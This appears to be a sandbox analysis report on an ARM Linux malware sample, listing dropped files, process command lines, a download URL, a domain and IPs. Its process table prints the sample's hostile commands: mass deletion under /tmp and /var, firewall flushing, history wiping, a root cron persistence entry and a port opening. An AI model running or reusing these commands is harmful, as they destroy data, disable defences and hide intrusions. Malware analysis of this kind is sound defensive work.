## Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| arm7.elf | ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped | initial sample | |
| /dev/ocmount | Bourne-Again shell script, ASCII text executable | dropped | |
| /etc/cron.d/mount.sh | ASCII text | dropped | |
## Processes

| Path | Cmdline | Malicious |
|---|---|---|
| /tmp/arm7.elf | `/tmp/arm7.elf` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"` | |
| /bin/sh | - | |
| /usr/bin/rm | `rm -rf /tmp/arm7.elf /tmp/config-err-IN1GlB /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-ntFb5z3TQVeu /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rehHTg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-rnzw4f /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-jxKacf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-9mYjrg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-Ylvv8i /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-VKEayg /tmp/vmware-root_727-4290690966 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rJRv0g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-2NWDdf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-WNhjUf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-YlFEtg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-GDC7pj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-NgTmVe /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-FqJmSi /var/log/wtmp` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "rm -rf /tmp/*"` | |
| /bin/sh | - | |
| /usr/bin/rm | `rm -rf /tmp/*` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "iptables -F"` | |
| /bin/sh | - | |
| /usr/sbin/iptables | `iptables -F` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "pkill -9 busybox"` | |
| /bin/sh | - | |
| /usr/bin/pkill | `pkill -9 busybox` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "pkill -9 perl"` | |
| /bin/sh | - | |
| /usr/bin/pkill | `pkill -9 perl` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "pkill -9 python"` | |
| /bin/sh | - | |
| /usr/bin/pkill | `pkill -9 python` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "service iptables stop"` | |
| /bin/sh | - | |
| /usr/sbin/service | `service iptables stop` | |
| /usr/sbin/service | - | |
| /usr/bin/basename | `basename /usr/sbin/service` | |
| /usr/sbin/service | - | |
| /usr/bin/basename | `basename /usr/sbin/service` | |
| /usr/sbin/service | - | |
| /usr/bin/systemctl | `systemctl --quiet is-active multi-user.target` | |
| /usr/sbin/service | - | |
| /usr/sbin/service | - | |
| /usr/bin/systemctl | `systemctl list-unit-files --full --type=socket` | |
| /usr/sbin/service | - | |
| /usr/bin/sed | `sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p` | |
| /usr/bin/systemctl | `systemctl stop iptables.service` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "/sbin/iptables -F; /sbin/iptables -X"` | |
| /bin/sh | - | |
| /sbin/iptables | `/sbin/iptables -F` | |
| /bin/sh | - | |
| /sbin/iptables | `/sbin/iptables -X` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "service firewall stop"` | |
| /bin/sh | - | |
| /usr/sbin/service | `service firewall stop` | |
| /usr/sbin/service | - | |
| /usr/bin/basename | `basename /usr/sbin/service` | |
| /usr/sbin/service | - | |
| /usr/bin/basename | `basename /usr/sbin/service` | |
| /usr/sbin/service | - | |
| /usr/bin/systemctl | `systemctl --quiet is-active multi-user.target` | |
| /usr/sbin/service | - | |
| /usr/sbin/service | - | |
| /usr/bin/systemctl | `systemctl list-unit-files --full --type=socket` | |
| /usr/sbin/service | - | |
| /usr/bin/sed | `sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p` | |
| /usr/bin/systemctl | `systemctl stop firewall.service` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "history -c"` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "rm -rf ~/.bash_history"` | |
| /bin/sh | - | |
| /usr/bin/rm | `rm -rf /root/.bash_history` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "history -w"` | |
| /tmp/arm7.elf | - | |
| /tmp/arm7.elf | - | |
| /tmp/arm7.elf | - | |
| /tmp/arm7.elf | - | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "chmod +x /dev/ocmount"` | |
| /bin/sh | - | |
| /usr/bin/chmod | `chmod +x /dev/ocmount` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c /dev/ocmount` | |
| /bin/sh | - | |
| /tmp/arm7.elf | - | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"` | |
| /bin/sh | - | |
| /usr/sbin/iptables | `iptables -A INPUT -p tcp --dport 26721 -j ACCEPT` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"` | |
| /bin/sh | - | |
| /bin/busybox | `/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"` | |
| /bin/sh | - | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"` | |
| /bin/sh | - | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"` | |
| /bin/sh | - | |
| /usr/bin/busybox | `busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT` | |
| /tmp/arm7.elf | - | |
| /tmp/arm7.elf | - | |
| /tmp/arm7.elf | - | |
| /tmp/arm7.elf | - | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"` | |
| /bin/sh | - | |
| /usr/sbin/iptables | `iptables -A INPUT -p tcp --dport 26721 -j ACCEPT` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"` | |
| /bin/sh | - | |
| /bin/busybox | `/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT` | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"` | |
| /bin/sh | - | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"` | |
| /bin/sh | - | |
| /tmp/arm7.elf | - | |
| /bin/sh | `/bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"` | |
| /bin/sh | - | |
| /usr/bin/busybox | `busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT` | |
| /tmp/arm7.elf | - | |
| /tmp/arm7.elf | - | |
| /tmp/arm7.elf | - | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | `dumpe2fs -h /dev/sda2` | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | `dumpe2fs -h /dev/sda2` | |
Note: 122 additional processes were recorded but are not shown in this excerpt; the process listing above is incomplete.
## URLs

| Name | IP | Malicious |
|---|---|---|
| `http://Change_ip/octopus_re.sh;chmod` | unknown | |

Note: the literal host `Change_ip` and the trailing `;chmod` suggest this entry was extracted from an embedded command string rather than from an observed network request; no IP was resolved for it.
## Domains

| Name | IP | Malicious |
|---|---|---|
| `octopus1337.geek` | 156.238.224.214 | |
## IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 185.125.190.26 | unknown | United Kingdom | |
| 156.238.224.214 | `octopus1337.geek` | Seychelles | |
| 212.118.43.167 | unknown | Russian Federation | |
## Memdumps

Note: the dumped regions carry 64-bit addresses although the sample is a 32-bit ARM ELF; whether they belong to the sample itself or to a host/emulation process is not stated in this report.

| Base Address | Regiontype | Protect | Malicious |
|---|---|---|---|
| 7fcc8003d000 | page execute read | | |
| 7fcc8003d000 | page execute read | | |
| 55aedaf9e000 | page read and write | | |
| 7fcd856cc000 | page read and write | | |
| 7fcc8004c000 | page read and write | | |
| 7fcd85d4e000 | page read and write | | |
| 55aedcf9c000 | page execute and read and write | | |
| 7fcd80021000 | page read and write | | |
| 55aedad44000 | page execute read | | |
| 7fcd863a6000 | page read and write | | |
| 7ffe6d4b5000 | page read and write | | |
| 7fcd84ec4000 | page read and write | | |
| 55aedaf95000 | page read and write | | |
| 55aedcfb3000 | page read and write | | |
| 7fcd8627d000 | page read and write | | |
| 7fcd7ffff000 | page read and write | | |
| 7fcd85eba000 | page read and write | | |
| 7fcd84ec4000 | page read and write | | |
| 55aedcf9c000 | page execute and read and write | | |
| 7fcc8004e000 | page read and write | | |
| 7fcd7ffff000 | page read and write | | |
| 55aedcfb3000 | page read and write | | |
| 7fcd8627d000 | page read and write | | |
| 7ffe6d4b5000 | page read and write | | |
| 7fcd80021000 | page read and write | | |
| 7fcc80045000 | page read and write | | |
| 7fcd863ca000 | page read and write | | |
| 7fcd8609c000 | page read and write | | |
| 7fcd85d2b000 | page read and write | | |
| 7fcd856cc000 | page read and write | | |
| 55aede96e000 | page read and write | | |
| 7fcd8640f000 | page read and write | | |
| 7fcd8640f000 | page read and write | | |
| 7fcd85d2b000 | page read and write | | |
| 7ffe6d5f4000 | page execute read | | |
| 7fcc80045000 | page read and write | | |
| 7ffe6d5f4000 | page execute read | | |
| 55aede96e000 | page read and write | | |
| 55aedaf95000 | page read and write | | |
| 7fcd85d4e000 | page read and write | | |
| 7fcd8609c000 | page read and write | | |
| 7fcd863a6000 | page read and write | | |
| 7fcd85eba000 | page read and write | | |
| 7fcd8575e000 | page read and write | | |
| 7fcd85ac0000 | page read and write | | |
| 7fcd8575e000 | page read and write | | |
| 55aedaf9e000 | page read and write | | |
| 7fcd85ac0000 | page read and write | | |
| 7fcd863ca000 | page read and write | | |
| 7fcc8004c000 | page read and write | | |
| 55aedad44000 | page execute read | | |
Note: 41 additional memory dumps were recorded but are not shown in this excerpt; the memdump listing above is incomplete.